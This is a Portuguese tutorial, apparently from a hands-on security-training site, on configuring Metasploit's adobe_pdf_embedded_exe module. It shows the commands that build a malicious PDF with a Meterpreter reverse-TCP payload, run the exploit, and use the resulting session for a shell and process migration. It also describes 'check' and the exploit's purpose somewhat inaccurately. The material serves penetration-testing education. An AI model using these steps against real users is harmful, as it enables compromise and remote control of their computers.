Como configurar opções para o módulo de exploração adobe_pdf_embedded_exe no Metasploit

HydraBeginner
Pratique Agora

Introdução

Este tutorial guiará você pelo processo de configuração do módulo de exploração adobe_pdf_embedded_exe na ferramenta de cibersegurança Metasploit. Ao final deste tutorial, você terá uma compreensão melhor de como aproveitar essa exploração para obter acesso e aprimorar suas habilidades em cibersegurança.

Visão Geral do Metasploit

O Metasploit é um poderoso framework de código aberto para desenvolver, testar e executar código de exploração contra sistemas de destino remotos. Ele fornece um conjunto abrangente de ferramentas e módulos que podem ser usados para identificar, explorar e obter acesso a sistemas vulneráveis.

O framework Metasploit é amplamente utilizado na comunidade de cibersegurança para diversos propósitos, incluindo testes de penetração, avaliação de vulnerabilidades e resposta a incidentes. Ele está disponível para múltiplos sistemas operacionais, incluindo Linux, Windows e macOS, e pode ser acessado por meio de uma interface de linha de comando (CLI) ou uma interface gráfica de usuário (GUI) conhecida como Metasploit Pro.

Uma das principais características do Metasploit é sua extensa biblioteca de explorações pré-construídas, que podem ser usadas para atacar uma ampla gama de vulnerabilidades de software. Essas explorações são organizadas em diferentes categorias, como execução remota de código, elevação de privilégios e negação de serviço, e podem ser facilmente configuradas e executadas usando o console Metasploit.

Para usar o Metasploit, os usuários geralmente começam configurando um ambiente Metasploit em seu sistema. Isso pode ser feito instalando o framework Metasploit, disponível para download no site oficial do Metasploit. Uma vez instalado, os usuários podem acessar o console Metasploit e começar a explorar os diversos módulos e ferramentas disponíveis.

O console Metasploit fornece uma poderosa interface de linha de comando para interagir com o framework. Os usuários podem usar o console para pesquisar e selecionar explorações, configurar seus payloads e opções, e executar a exploração contra um sistema de destino. O console também oferece uma série de outras funcionalidades, como a capacidade de gerenciar sessões, coletar informações sobre sistemas de destino e realizar atividades de pós-exploração.

No geral, o Metasploit é uma ferramenta crucial para qualquer pessoa que trabalhe na área de cibersegurança, pois fornece uma plataforma abrangente e flexível para identificar, explorar e obter acesso a sistemas vulneráveis.

Configurando a Exploração adobe_pdf_embedded_exe

O módulo de exploração adobe_pdf_embedded_exe no Metasploit foi projetado para atacar uma vulnerabilidade no Adobe Reader e Acrobat que permite a execução de código arbitrário. Essa exploração pode ser particularmente útil em cenários onde um atacante obteve acesso a um sistema de destino e precisa escalar seus privilégios ou executar payloads adicionais.

Para configurar o módulo de exploração adobe_pdf_embedded_exe, siga estas etapas:

Selecionando o Módulo de Exploração

  1. Inicie o console Metasploit executando o seguinte comando em seu terminal Ubuntu 22.04:
    msfconsole
  2. No console Metasploit, procure o módulo de exploração adobe_pdf_embedded_exe usando o seguinte comando:
    search adobe_pdf_embedded_exe
  3. Selecione o módulo apropriado executando o comando use, seguido do nome do módulo:
    use exploit/windows/fileformat/adobe_pdf_embedded_exe

Configurando as Opções da Exploração

Depois de selecionar o módulo de exploração adobe_pdf_embedded_exe, você pode configurar as diversas opções para atender às suas necessidades. Você pode visualizar as opções disponíveis executando o comando show options:

show options

Isso exibirá uma tabela com os parâmetros obrigatórios e opcionais, juntamente com seus valores atuais. Você pode definir os valores desses parâmetros usando o comando set, por exemplo:

set FILENAME malicious.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

Neste exemplo, estamos definindo a opção FILENAME para malicious.pdf, a opção PAYLOAD para windows/meterpreter/reverse_tcp, a opção LHOST para 192.168.1.10 e a opção LPORT para 4444.

Após configurar as opções da exploração, você pode verificar as configurações executando novamente o comando show options.

Validando a Configuração da Exploração

Antes de executar a exploração, é uma boa prática validar a configuração para garantir que todas as opções necessárias foram definidas corretamente. Você pode fazer isso executando o comando check:

check

Se a configuração for válida, o comando check indicará que a exploração está pronta para ser executada.

Agora que você configurou o módulo de exploração adobe_pdf_embedded_exe, você está pronto para executar a exploração e obter acesso ao sistema de destino.

Executando a Exploração e Obtendo Acesso

Depois de configurar o módulo de exploração adobe_pdf_embedded_exe, você pode executar a exploração e tentar obter acesso ao sistema de destino.

Executando a Exploração

Para executar a exploração, basta executar o comando exploit ou run no console Metasploit:

exploit

ou

run

Isso iniciará a exploração e tentará executar o payload especificado no sistema de destino.

Obtendo Acesso

Se a exploração for bem-sucedida, você verá uma saída no console Metasploit indicando que uma sessão foi estabelecida. Essa sessão representa uma conexão com o sistema de destino, e você pode usá-la para interagir com o sistema comprometido.

Para interagir com a sessão estabelecida, você pode usar o comando sessions para listar todas as sessões ativas e, em seguida, usar o comando sessions -i <session_id> para mudar para uma sessão específica. Depois de mudar para a sessão, você pode usar os diversos módulos e comandos de pós-exploração do Metasploit para coletar informações, escalar privilégios e realizar ações adicionais no sistema de destino.

Por exemplo, você pode usar o comando shell para obter um prompt de comando no sistema de destino ou o comando migrate para migrar o payload para um processo diferente, o que pode ajudar a melhorar a estabilidade e longevidade da sessão.

sessions -i 1
shell
migrate 1234

Ao executar a exploração adobe_pdf_embedded_exe e obter acesso ao sistema de destino, você pode então prosseguir para realizar atividades adicionais de reconhecimento, escalonamento de privilégios e movimentação lateral como parte de seus testes de penetração ou avaliação de segurança geral.

Resumo

Neste tutorial de Segurança Cibernética, você aprendeu como configurar as opções do módulo de exploração adobe_pdf_embedded_exe no Metasploit. Ao executar a exploração e obter acesso, você expandiu seus conhecimentos e habilidades na área de Segurança Cibernética. Este tutorial fornece um recurso valioso para aqueles interessados em explorar o cenário de Segurança Cibernética e utilizar o Metasploit para aprimorar suas capacidades de teste de segurança.